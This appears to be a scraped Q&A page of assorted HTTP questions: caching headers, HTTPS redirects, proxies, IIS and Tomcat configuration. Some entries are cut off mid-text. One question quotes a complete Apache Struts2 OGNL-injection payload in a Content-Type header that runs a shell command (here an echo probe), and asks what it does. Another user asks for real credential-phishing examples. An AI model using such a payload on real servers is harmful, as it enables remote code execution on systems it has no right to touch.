HTTP Protocol

The Hypertext Transfer Protocol (HTTP) is an application protocol for distributed, collaborative, hypermedia information systems. Hypertext is structured text that uses logical links (hyperlinks) between nodes containing text. HTTP is the protocol to exchange or transfer hypertext. HTTP functions as a request-response protocol in the client-server computing model. HTTP is designed to permit intermediate network elements to improve or enable communications between clients and servers. HTTP is an application layer protocol designed within the framework of the Internet Protocol Suite; it presumes an underlying and reliable transport layer protocol.

Hi Experts

I am working on a Wagtail project (similar to django CMS). I get this error when I run python3 runserver:

code 400, message Bad request syntax
  You're accessing the development server over HTTPS, but it only supports


I changed SECURE_SSL_REDIRECT = False and tested it; I still get the same error. I disabled the cache in Chrome.

I deactivated Chrome caching in the registry with the following steps.

Deactivate Chrome Cache in the Registry

Open the Registry editor (Start -> Run -> regedit)

Search for: HKEY_CLASSES_ROOT\ChromeHTML\shell\open\command

Change the part after ...chrome.exe" to this value: --disable-application-cache --media-cache-size=1 --disk-cache-size=1 -- "%1"

Example: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --disable-application-cache --media-cache-size=1 --disk-cache-size=1 -- "%1"

I also tried disabling the cache from the Chrome developer tools (Network -> Disable cache).

I also tried clearing the HSTS cache in Chrome.

I also tried from an incognito window in Chrome, but I still get the same error.

It is an Ubuntu machine on AWS (accessed via PuTTY from a Windows PC).

I access it from outside (a local Windows PC) through http://54.23x.9x.17:8000. I am not able to resolve this error.

I also tried on another machine and got the following on the console for Ubuntu Linux:

The URL is changing to https instead of http, and I got "GET / HTTP/1.1" 301 0 in the console window.
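For reference, the setting change described above would look like this in a valid settings.py (a hypothetical fragment, not the asker's actual file; note that Python spells the boolean False, so SECURE_SSL_REDIRECT=FALSE would itself raise a NameError):

```python
# settings.py -- hypothetical fragment for illustration only.
# Python's boolean is spelled False; FALSE (all caps) is a NameError.
SECURE_SSL_REDIRECT = False

# Assumption for illustration: keep HSTS off while developing, since a
# previously sent Strict-Transport-Security header makes the browser
# keep forcing https:// regardless of what the server now says.
SECURE_HSTS_SECONDS = 0
```

Even with this in place, runserver itself never speaks HTTPS, so the 301 on the console usually means a redirect to https is still being issued or cached somewhere along the way.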

Please help me in resolving this error.

With Many Thanks, Bharath AK

In Android 6.0, using SDK 25, should the system properties http.keepAlive and http.maxConnections be obeyed?

With netstat, I can verify that in the system there are 2 TCP connections continuously open to my server. These connections appear to be neatly reused for HTTP keep alive and they appear when I start the player, disappear when I stop the player. I am using ExoPlayer for live dash streaming (player is downloading approx 3-5 files every 10 seconds from the same server, audio chunk, video chunk and manifest).

But the underlying system seems to ignore the http.maxConnections (and even http.keepAlive) that I wish to control.

My goal is to set http.maxConnections to 1 and ensure there is exactly 1 HTTP keep alive (TCP) connection open to the server. Any way to accomplish this?

Generally, the pre-check directive is very similar to max-age. However, IE's implementation of max-age takes the Age response header into account. In contrast, the implementation of post-check and pre-check do not. Hence, pre-check is equivalent to max-age only when there is no Age header on the response.

This article is from 2009, so it's pretty old. How are max-age and the Age header related nowadays? Or are they not related at all anymore?
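They are still related in current HTTP caching (RFC 7234): the Age header seeds a stored response's current age, which is then compared against max-age. A rough Python sketch (the function name and simplifications are mine):

```python
def is_fresh(max_age, age_header, resident_time):
    # Simplified RFC 7234 freshness check: the Age header received with
    # the response seeds its age, time spent in this cache adds to it,
    # and the response is fresh while the total stays under max-age.
    current_age = age_header + resident_time
    return current_age < max_age

# max-age=60, response arrived at the cache already 50 seconds old:
assert is_fresh(60, 50, 5)        # 55s old -> still fresh
assert not is_fresh(60, 50, 15)   # 65s old -> stale
```

So unlike the old IE pre-check behavior quoted above, a compliant cache does take Age into account.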
Hi guys,

I'm looking for a way to prevent Squid from issuing valid HTML answers when it encounters an error condition. Namely, I do not want an HTML page stating that the Squid proxy is shutting down when I'm synchronizing a bunch of shell scripts programmatically. I want Squid to issue a 4xx/5xx error instead, or possibly reject the connection, or just not respond (in order of preference).

Is that achievable?


If not, I'm interested in an alternate SIMPLE proxy.

The caveat is that I'm limited to either Debian packages or something I can bundle easily.

I've already ruled out or experimented with the following candidates:
- tinyproxy: awfully buggy, though initially most likely a good program.
- a custom Perl script based on HTTP::Proxy: works fine but keeps unread data in its buffers and prepends it to a different query. I have no idea how to instruct HTTP::Proxy to tell Net::Server to just trash the worker thread entirely, and this produces random errors.
- ffproxy: cannot disable the CONNECT method.
- Apache is way too heavy (even worse than Squid, which I actually did not want to use).
- lighttpd does not do forward proxying.
- I'd rather not use nginx for this task because of the complexity of embedding code in the config, and for entirely different reasons which are too long to state here; anyway, it's obviously not meant for the job.
- I cannot use anything with too many dependencies; Python is clearly a no-go.

My question is about one specific reason to use max-age over Expires.

See for example:
Although the Expires header is useful, it has some limitations. First, because there’s a date involved, the clocks on the Web server and the cache must be synchronised; if they have a different idea of the time, the intended results won’t be achieved, and caches might wrongly consider stale content as fresh.

But with max-age you also have the exact same problem, right? In my opinion there are 2 possibilities:

1. A cache receives a response from a server. The cache's clock starts counting from that moment. If there were a delay between the server sending the response and the cache receiving it, the age would be incorrect. So this is not a good way to calculate the age.

2. A cache receives a response from a server. The age of the response is calculated as a difference between the cache's current date and the Date general header included in the HTTP response.

Case 2 is in my opinion the right way to calculate the age of the response. But the response header field "Date" will be determined by the server, just like "Expires" will be determined by the server. So in both cases the server's clock will be compared with the cache's clock. So in this respect (clock synchronization), I see no difference between max-age and Expires?

With case 1 they would be right, because then the cache's clock on moment A …
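For what it's worth, case 2 is close to what RFC 7234 actually specifies, with one extra safeguard: the apparent age is clamped at zero, so a server clock running ahead of the cache cannot produce a negative age. A simplified sketch (the real algorithm also corrects for the Age header and the request/response delay, omitted here):

```python
def apparent_age(date_value, response_time):
    # RFC 7234 section 4.2.3, simplified: compare the cache's own clock
    # at the moment the response was received against the server's Date
    # header, clamping clock skew to zero instead of going negative.
    return max(0, response_time - date_value)

# Server clock 30s ahead of the cache: skew is clamped, age is 0.
assert apparent_age(date_value=1000, response_time=970) == 0
# Normal case: received 10s after the server generated the response.
assert apparent_age(date_value=1000, response_time=1010) == 10
```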
When a stored response is used to satisfy a request without validation, my browser is not showing me the HTTP response header field "Age".

Just take a simple test.html file, which is cacheable by default. Now visit the page twice, so that the second time the file is served directly from cache without validation.

Firefox shows me response headers like this:

Date: Mon, 12 Mar 2018 16:05:18 GMT
Server: Apache/2.4.17 (Unix) OpenSSL/1.0.1e-fips PHP/5.6.16
Last-Modified: Mon, 12 Mar 2018 12:24:12 GMT
Accept-Ranges: bytes
Content-Length: 143
Content-Type: text/html


But why does Firefox not show me the "Age" header field?


When a stored response is used to satisfy a request without validation, a cache MUST generate an Age header field

And see:

However, lack of an Age header field does not imply the origin was contacted, since the response might have been received from an HTTP/1.0 cache that does not implement Age.

A browser's cache is not HTTP/1.0, so the response headers must contain an Age header field. Why is Firefox not showing me "Age"?

Are browsers only showing the response and request headers from the server? But if that were the case, they would have to show no response headers at all, because there was no response from the server in the case of "200 OK (cached)".

So I don't understand this. What's the logic behind it?

P.S. The example was about Firefox, but for example Chrome is doing the same.

PHP is using:

Expires: Thu, 19 Nov 1981 08:52:00 GMT


I don't understand this 100%. A cache could have a different idea about the time. Although it's really rare, a cache could think it's 1980. In a case like that, the cached copy would be seen as fresh.

When using:

Expires: 0


you can avoid problems like that. So in my opinion PHP is choosing the second-best solution instead of the best solution.


A cache recipient MUST interpret invalid date formats, especially the
value "0", as representing a time in the past (i.e., "already

So when using the value "0", you know for sure it will be seen as a date in the past. But this is the protocol for HTTP/1.1 (not HTTP/1.0).

I was also searching for some information about HTTP/1.0 and invalid dates, but I could not find an answer. I know HTTP/1.0 CAN implement things from HTTP/1.1.

How do HTTP/1.0 caches deal with invalid dates? And can I be sure that in all situations "Expires: 0" will be seen as a date in the past? If not, do you have examples?

I saw Google is using:

Expires: -1


In the past, people were setting Expires via the HTML meta tag; in cases like that, "-1" could mean something different than "0". But in what kind of situations does "Expires: -1" mean something different than "Expires: 0" in the HTTP headers?

So what to use? Date in the past, 0 or -1?
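To make the HTTP/1.1 rule concrete, here is a rough sketch (the function name is mine) of how a compliant recipient classifies these values; "0", "-1", and any other unparseable string all land in the same "already expired" bucket:

```python
from email.utils import parsedate_to_datetime

def expires_is_past(expires_value):
    # RFC 7234 section 5.3: a recipient MUST interpret invalid date
    # formats, especially the value "0", as a time in the past.
    try:
        parsedate_to_datetime(expires_value)
    except (TypeError, ValueError):
        return True   # unparseable -> treat as already expired
    return False      # valid HTTP-date: compare against the clock instead

assert expires_is_past("0")
assert expires_is_past("-1")
assert not expires_is_past("Thu, 19 Nov 1981 08:52:00 GMT")
```

Under HTTP/1.1 the three options are therefore equivalent; the open question in this thread is only how pre-1.1 software behaves.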
I'm trying to understand:

Vary: Accept-Encoding


Let's say we have:

- client 1 (only understands gzip-encoding)
- client 2 (only understands deflate-encoding)
- a shared cache
- a server (supports gzip and deflate encoding / compression, so the server can send the response message body encoded / compressed)
- a resource (1 url, cacheable)

If client 1 makes the first request to the resource, the response will be stored in the cache, gzip-encoded. If client 2 now makes a request, the cache will serve the gzip-encoded version, which client 2 does not understand.

This is what I understand about it from the internet. But this sounds weird to me.

1. The stored response in the cache must contain "Content-Encoding: gzip", because when a server sends an encoded response, it tells you which encoding has been used. So if I were a cache and I got a request with "Accept-Encoding: deflate" (or with an empty value), as a cache I know that my stored response is gzip-encoded (because of the stored "Content-Encoding: gzip"). Then I don't need "Vary: Accept-Encoding" to know that I have to make a new request to the server?

So why "Vary: Accept-Encoding" exists anyway and in what kind of situations it really makes a difference?

2. Are there also caches around which can decode / encode (gzip / deflate)? In cases like that there is also no need to add "Vary: Accept-Encoding", because a cache could decode …
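One way to see why Vary exists: rather than only detecting a mismatch via Content-Encoding and re-fetching, a Vary-aware cache stores one variant per listed request-header value, so both encodings can sit in the cache at once. A rough sketch (names are mine, not from any particular cache implementation):

```python
def cache_key(url, vary_headers, request_headers):
    # One cache entry per combination of URL and the request-header
    # values named by Vary -- e.g. "Vary: Accept-Encoding" keeps a
    # gzip variant and a deflate variant side by side.
    return (url,) + tuple(request_headers.get(h, "") for h in vary_headers)

k_gzip = cache_key("/page", ["Accept-Encoding"], {"Accept-Encoding": "gzip"})
k_defl = cache_key("/page", ["Accept-Encoding"], {"Accept-Encoding": "deflate"})
assert k_gzip != k_defl  # separate entries: client 2 never gets the gzip copy
```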
If you have, for example, an image with max-age=31536000, when using HTTPS what is the best thing to do:

Cache-Control: public, max-age=31536000


Cache-Control: private, max-age=31536000


Cache-Control: max-age=31536000


Which one and why?

I also did some own research, but I'm not sure yet what the answer has to be. I think this is true:

By default web browsers should cache content over HTTPS the same as over HTTP, unless explicitly told otherwise via the HTTP Headers received.

This is about the cache of the browser. For shared caches I think this is true:

If the request is authenticated or secure (i.e., HTTPS), it won’t be cached by shared caches.

Google is saying here, see:

If the response is marked as "public", then it can be cached, even if it has HTTP authentication associated with it, and even when the response status code isn't normally cacheable. Most of the time, "public" isn't necessary, because explicit caching information (like "max-age") indicates that the response is cacheable anyway.

That's what Google is saying, but I also checked what they are doing. See:

cache-control:private, max-age=31536000


cache-control:public, max-age=31536000

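The decision a shared cache makes can be sketched roughly like this (a simplification of RFC 7234 section 3; the real rules also involve s-maxage and must-revalidate, which are omitted here):

```python
def shared_cache_may_store(cache_control, has_authorization):
    # Simplified shared-cache storage rule: "private" always forbids
    # storage in a shared cache, and a response to a request carrying
    # an Authorization header is only storable when a directive like
    # "public" explicitly allows it. Plain HTTPS by itself does not
    # forbid storage -- only the directives do.
    if "private" in cache_control:
        return False
    if has_authorization and "public" not in cache_control:
        return False
    return True

assert not shared_cache_may_store({"private", "max-age=31536000"}, False)
assert shared_cache_may_store({"public", "max-age=31536000"}, True)
assert shared_cache_may_store({"max-age=31536000"}, False)
```

This matches the quoted Google text: "public" mostly matters for the authenticated case; otherwise max-age alone already makes the response cacheable.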

Response headers can contain something like:

Cache-Control: must-revalidate


But "must-revalidate" does not exist for the request headers, see:

Why? Is there a reason behind this?

Take for example me, my browser, my browser's cache, and the origin server. Let's say there is a stale cached copy in the browser's cache. Imagine I don't want the cached copy to be served without making any request to the server, not even if the cache is disconnected from the origin server. I would add must-revalidate to the request headers, but this directive only exists for the response headers.

Why is that and what's behind it? Directives like max-age, no-cache, and no-store exist for both the response AND the request headers, so why is must-revalidate an exception?
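One way to see the asymmetry: must-revalidate is a promise the origin makes about its own resource, which a cache must honor even when disconnected, whereas a client that never wants an unvalidated copy can already say so with the no-cache request directive. A rough sketch of the response-side effect (names and simplifications are mine):

```python
def may_serve_stale(response_directives, disconnected):
    # "must-revalidate" forbids serving the stored response stale under
    # any circumstances -- a disconnected cache must return an error
    # (e.g. 504) instead of the stale copy. Without it, stale responses
    # are tolerated only while the cache cannot reach the origin.
    if "must-revalidate" in response_directives:
        return False
    return disconnected

assert not may_serve_stale({"must-revalidate", "max-age=0"}, disconnected=True)
assert may_serve_stale({"max-age=0"}, disconnected=True)
assert not may_serve_stale({"max-age=0"}, disconnected=False)
```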

Let's first take a look at the definitions.

1. Max-age in request headers:

The "max-age" request directive indicates that the client is
unwilling to accept a response whose age is greater than the
specified number of seconds.  Unless the max-stale request directive
is also present, the client is not willing to accept a stale

2. Max-age in the response headers:

The "max-age" response directive indicates that the response is to be
considered stale after its age is greater than the specified number
of seconds.

And see:

A cache MUST NOT send stale responses unless it is disconnected
(i.e., it cannot contact the origin server or otherwise find a
forward path)

So is it true that "max-age=0" in the response headers is NOT equivalent to "no-cache" in the response headers (because of the disconnected case), BUT "max-age=0" in the request headers IS equivalent to "no-cache" in the response headers?
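The comparison being asked about can be sketched like this (a simplification; names are mine):

```python
def must_validate_before_serving(request_directives, response_directives,
                                 disconnected):
    # "no-cache" (request or response) demands successful validation,
    # full stop. Request "max-age=0" merely makes any stored copy stale,
    # and a disconnected cache MAY still serve a stale response -- which
    # is exactly the gap between the two directives.
    if "no-cache" in request_directives or "no-cache" in response_directives:
        return True
    if "max-age=0" in request_directives:
        return not disconnected
    return False

assert must_validate_before_serving({"max-age=0"}, set(), disconnected=False)
assert not must_validate_before_serving({"max-age=0"}, set(), disconnected=True)
assert must_validate_before_serving(set(), {"no-cache"}, disconnected=True)
```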

3. No-cache in the request headers:

The "no-cache" request directive indicates that a cache MUST NOT use
a stored response to satisfy the request without successful
validation on the origin server.

4. No-cache in the response headers:
Dear sirs,
I am setting up a global exception handler in Spring. Once an exception is caught, a method in the @ControllerAdvice is called and returns a specific view with the exception details. Among the info returned with the view I have the HttpStatus. Actually, I keep getting 200, while the right HttpStatus should be 500, 404, etc.
Here is my code
public class AppGlobalExceptionHandler {
      /*
       * Note: You can either point to Exception types or an HTTP ResponseStatus:
       * @ExceptionHandler({MyException.class})
       * public String ...
       * @ExceptionHandler
       * @ResponseStatus(HttpStatus.INTERNAL_SERVER_ERROR)
       * public String ...
       */
      public String handleAnyException(Exception exception, Model model,
                  HttpServletRequest request, HttpServletResponse response) {
            log.error("Request raised " + exception.getClass().getSimpleName());
            String details = ExceptionUtils.getStackTrace(exception);
            AppError error = new AppError();
            model.addAttribute(AppStringHandler.VARIABLE_URL_SUBMIT, AppStringHandler.URL_TASKS_SEND_EMAIL_500);
            model.addAttribute(AppStringHandler.VARIABLE_URL_REDIRECT, AppStringHandler.URL_ADMIN_REDIRECT);
            model.addAttribute(AppStringHandler.VIEW_ERROR_MODEL_ATTRIBUTE, error);
Our mobile app is experiencing a strange behavior in a place where they have WiFi. If the app uses THAT WiFi there's an HTTP POST request (to our API) that gets the response content truncated randomly (not always truncated, and if truncated not always at the same place).

I made several tests at that place (using the app and also Postman) and found that on mobile data the response always comes OK, but when connecting with that WiFi the response sometimes gets truncated. Also, I saw that other API requests get the response correctly, even when the content length is 10 times bigger (I thought that maybe the response was too big, but we're talking about just 10Kb).

The failing request is a regular POST request sent to a REST API made with Dropwizard. The request gets processed correctly on the server, which returns status 200 and the content. The client gets the status 200 but the content is truncated, so the whole operation can't be finished.

I wonder if there's something wrong with that WiFi, or if this kind of response error must be expected and dealt with by our application. I haven't seen this behavior before.
I want to create an IIS URL rewrite rule which makes the site respond with the same content on any request. This rule is to be applied when the site goes under maintenance.
My rule looks like the following:
                <rule name="Stub" enabled="true" patternSyntax="ECMAScript" stopProcessing="true">
                    <match url=".*" />
                    <conditions>
                        <add input="{REMOTE_ADDR}" pattern="" negate="true" />
                        <add input="{REMOTE_ADDR}" pattern="172.31.3" negate="true" />
                    </conditions>
                    <action type="Rewrite" url="/maintenance.htm?URL={R:0}" appendQueryString="true" logRewrittenUrl="true" />
                </rule>


It works perfectly for any request to resources in the root folder. But on any request to a sub-directory the server responds with 403 Forbidden.

For example, a request to the root correctly returns the content of the file maintenance.htm (located in the site's root folder), but a request like /2/s.gif returns
 <h2>403 - Forbidden: Access is denied.</h2>
  <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>


(there is a file /2/s.gif and it is correctly returned when the rule is disabled).
In the W3SVC log file I can see:
2017-12-20 22:01:36 GET /maintenance.htm URL=2/s.gif 443 - Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:52.0)+Gecko/20100101+Sea-Monkey/2.49.1+(similar+to+Firefox/52.0) - 403 18 0 78


Please help.
My question is about:

They're saying:

The problem with that line of reasoning is that HTTP versions aren’t black and white like this; just because something advertises itself as HTTP/1.0, doesn’t mean it doesn’t understand HTTP/1.1 (see RFC2145 for more).

But here they are saying:

If a response includes both an Expires header and a max-age directive, the max-age directive overrides the Expires header, even if the Expires header is more restrictive. This rule allows an origin server to provide, for a given response, a longer expiration time to an HTTP/1.1 (or later) cache than to an HTTP/1.0 cache.

So either the article is incorrect, or W3 is incorrect (or I'm wrong :p). With the last sentence, W3 means you can give a different expiration time to an HTTP/1.1 (or later) cache compared with an HTTP/1.0 cache. You can do this by using max-age and the Expires header together.
They can only say something like that by assuming the HTTP/1.0 cache will ignore max-age, because otherwise you would just have the same expiration time for all caches (HTTP/1.0 and HTTP/1.1 et cetera).

So what is true about HTTP/1.0 caches understanding max-age?
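The dual-header trick the W3 text describes can be sketched like this (a simplification; whether a given cache "understands max-age" is exactly the gray area the article points out, since self-declared HTTP/1.0 software may still implement it):

```python
def freshness_lifetime(understands_max_age, max_age, expires_minus_date):
    # A cache that implements max-age lets it override Expires;
    # one that ignores max-age falls back to Expires minus Date.
    if understands_max_age and max_age is not None:
        return max_age
    return expires_minus_date

# Same response, two audiences: one hour for max-age-aware caches,
# already expired for caches that only honor Expires.
assert freshness_lifetime(True, 3600, 0) == 3600
assert freshness_lifetime(False, 3600, 0) == 0
```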

In this sample GET request

GET / HTTP/1.1
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(,#ros)).(#ros.flush())}
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Connection: Keep-Alive

The Content-Type begins with something that is not normal. Is it trying to get the web server to process it and execute something? I also see java.lang, so it is trying to call a Java function. What is it trying to do with Java?

What is it doing with the Windows command prompt and the bash shell?

What is the purpose of echoing "Struts2045"?
This is a great video (however the links no longer work):
I need a real-life example of how, if someone clicks on a bad link via email or another avenue, the redirected website collects their credentials. Anyone have any good ones?

Hello, does anyone know how to transfer iPhone contacts and messages to an Android phone without any loss? I've tried many ways to transfer them but always fail, and I don't know how to connect the two different phones.
How can I disable HTTPS and enable HTTP on Apache Tomcat?
Based on my research I have to modify the server.xml in the root folder of Apache Tomcat. Must I modify the connector? How?
For my web application I'm connecting to port 8443.
<?xml version='1.0' encoding='utf-8'?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<!-- Note:  A "Server" is not itself a "Container", so you may not
     define subcomponents such as "Valves" at this level.
     Documentation at /docs/config/server.html
-->
<Server port="-1" shutdown="SHUTDOWN">
  <!-- Security listener. Documentation at /docs/config/listeners.html
  <Listener className="" />
  -->
  <!--APR library loader. Documentation at
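For comparison, a plain-HTTP connector in server.xml typically looks something like the fragment below (the port and attribute values are assumptions for illustration; the existing HTTPS connector on 8443 would then be commented out or removed):

```xml
<!-- Hypothetical plain-HTTP connector sketch: adjust the port to taste -->
<Connector port="8080" protocol="HTTP/1.1"
           connectionTimeout="20000" />
```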


How to display html detail when clicking submipls
In Internet Explorer I am able to access an HTTPS site and download a file. I have to use a username and password to access the site first.
However, when I enter the URL and credentials in SSIS using the HTTP connection manager and press the Test Connection button, I get the message:

The remote server returned an error: (401) Unauthorized.

Any ideas why this is happening? The username and password are correct.

Can I use an HTTPS site in an HTTP connection?

Any help appreciated.

I have used 3 sets of code (using the Indy 10.6.2 component), none of which shows any errors, but I am not able to send an SMS. Please help me send an SMS through Delphi code.

The code I used is:

const
  URL = '****&hash=****&sender=TXTLCL&numbers=9198........&message=HISUNDAR';
  //URL = '*****&hash=******&sender=TXTLCL&numbers=9198...&message=HISUNDAR';
  ResponseSize = 1024;
var
  hSession, hURL: HInternet;
  Request: String;
  ResponseLength: Cardinal;
begin
  hSession := InternetOpen('TEST', INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0);
  Request := Format(URL, [Username, Password, Sender, Numbers, HttpEncode(Message1)]);
  hURL := InternetOpenURL(hSession, PChar(Request), nil, 0, 0, 0);
  SetLength(Result, ResponseSize);
  InternetReadFile(hURL, PChar(Result), ResponseSize, ResponseLength);
  SetLength(Result, ResponseLength);
end;

var
  http: TIdHTTP;
  IdSSL: TIdSSLIOHandlerSocketOpenSSL;
begin
  http := TIdHTTP.Create(nil);
  IdSSL := TIdSSLIOHandlerSocketOpenSSL.Create(nil);
  http.ReadTimeout := 30000;
  http.IOHandler := IdSSL;
  IdSSL.SSLOptions.Method := sslvTLSv1;
  http.Request.BasicAuthentication := True;
  // IdSSL.SSLOptions.Method := sslvTLSv1;
end;
I am using the following query to get the CNAME record needed to load my site properly. The issue: the code below works, but only after refreshing a couple of times.

Query:

$recsDNS = dns_get_record($_SERVER['HTTP_HOST'], DNS_CNAME);

I am not getting the CNAME records reliably; sometimes they come back and sometimes they don't.

If I use DNS_ALL, I get the CNAME records after refreshing 3 to 4 times.
I had this question after viewing XP driver for Iomega Zip with USB-to-serial converter.

Does this driver help you? (The second download button.)

That download was basically just a blank file.

Is there some other way to get an original driver, as all the leads I have found are for updates?

Thank you,
Hello all,

My site was working fine under regular HTTP. When I was forced to move over to a secure HTTPS site, Ajax stopped working. I don't know what I am doing wrong.

the code is below:
			$.ajax({
				type: "POST",
				url: "update_location.php",
				success: function(data){
					// ...
				}
			});

